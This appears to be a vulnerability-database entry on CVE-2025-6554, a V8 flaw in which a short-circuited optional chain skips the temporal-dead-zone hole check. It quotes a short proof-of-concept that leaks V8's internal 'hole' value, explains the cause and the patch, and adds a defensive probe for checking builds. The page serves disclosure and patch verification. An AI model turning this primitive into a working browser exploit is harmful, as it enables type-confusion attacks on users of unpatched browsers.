Related vulnerability
Introduction
# CVE-2025-6554
**CVE-2025-6554** is a vulnerability in the interpreter of V8, Chrome's JavaScript engine: an inadequate "hole check" on variables referenced inside expressions that use optional chaining. The PoC (CVE-2025-6554-POC.JS) exploits a flaw in the mechanism that checks variables for the "hole" sentinel before use, allowing an uninitialized value to be read, a behaviour that is normally blocked by a ReferenceError.
```js
function leak_hole() {
  let x;
  delete x?.[y]?.a;   // y is referenced inside the optional chain before its declaration
  return y;           // should throw a ReferenceError: y is still in its TDZ
  let y;
}
function pwn() {
  let hole = leak_hole();
  %DebugPrint(hole);  // V8 native syntax; needs the --allow-natives-syntax flag
}
pwn();
```
---
## Technical Explanation
### 1. Structure of the Vulnerable Code
`let x;` and `let y;` declare block-scoped local variables.
The line `delete x?.[y]?.a;` uses optional chaining to access a nested property safely.
Problem: the variable `y` is used before it is declared, which should throw a ReferenceError, but in pre-patch V8 this failed silently, allowing the code to capture the special value called "the hole" (V8's sentinel for variables in the Temporal Dead Zone, TDZ).
The `return y` in the code should not be able to read `y`, because `y` is still in the TDZ. But the flaw allows it.
### 2. Behavior before patch
The mechanism that prevents access to variables in the TDZ is the `ThrowReferenceErrorIfHole` bytecode.
Before the patch, this check was emitted only once, during `delete x?.[y]?.a`.
V8 internally marked variable `y` as already verified "not a hole", but this verification escaped the controlled scope and was therefore not re-evaluated for `return y`.
### 3. What was corrected
The patch adds another mandatory `ThrowReferenceErrorIfHole` on `return y`, ensuring that any attempt to access `y` before its declaration correctly throws an error.
This check is now guaranteed by the `HoleCheckElisionScope`, which is included in all uses of `OptionalChainNullLabelScope`.
## Attack flow
```
delete x?.[y]?.a → attempt to access y (not initialized) → "hole" check fails
→ y escapes as a value → return y; → caller captures the "hole" → %DebugPrint reveals it
```
An attacker who captures this "hole" can infer the internal state of the V8 engine, facilitating attacks such as:
- Type confusion exploitation
- Stack manipulation
- Scope check circumvention
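The following probe is an added example, not code from the PoC repository. It runs the TDZ-read pattern from sections 1 to 3 in three variants and classifies whether the engine stops each one with a ReferenceError, so a defender can check whether a given V8 build still enforces the hole check after a short-circuited optional chain. Function names and the `classify` result shape are assumptions of this example.

```javascript
// Added probe (not part of the PoC repository): does this engine enforce the
// Temporal Dead Zone (TDZ) for a `let` binding that is first named inside a
// short-circuited optional chain and then read before its declaration?
// On a patched V8 every probe below throws ReferenceError; on the unpatched
// build described above, probeShortCircuit() returns V8's internal hole.

function probeDirect() {
  return y;          // plain TDZ read: throws ReferenceError in every build
  let y;
}

function probeEvaluatedChain() {
  let x = {};        // x is an object, so `x?.[y]` really evaluates y
  delete x?.[y]?.a;  // throws ReferenceError here, in every build
  return y;
  let y;
}

function probeShortCircuit() {
  let x;             // x is undefined, so `x?.[y]` short-circuits: y is
  delete x?.[y]?.a;  // never evaluated, yet V8 recorded it as hole-checked
  return y;          // patched: ReferenceError; unpatched: leaks the hole
  let y;
}

// Run a probe and classify the outcome; the returned value is never inspected.
function classify(probe) {
  try {
    probe();
    return { enforced: false, error: null };
  } catch (e) {
    return { enforced: e instanceof ReferenceError, error: e.name };
  }
}

const PROBES = { probeDirect, probeEvaluatedChain, probeShortCircuit };

// true only if every probe was stopped by a ReferenceError
function tdzEnforced() {
  return Object.values(PROBES).every((p) => classify(p).enforced);
}

for (const [name, probe] of Object.entries(PROBES)) {
  console.log(name, classify(probe));
}
console.log("TDZ enforced in optional chains:", tdzEnforced());
```

Run it with the `d8` or `node` binary under test; a `false` for `probeShortCircuit` means the build elides the hole check the patch restores.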
File snapshot
[4.0K] /data/pocs/4ed2367714cac67ee7fe6a3a4ee49fc8e81d5782
├── [ 21K] Exploit.js
├── [2.2K] README.md
└── [ 933] Test-Exploit.js
0 directories, 3 files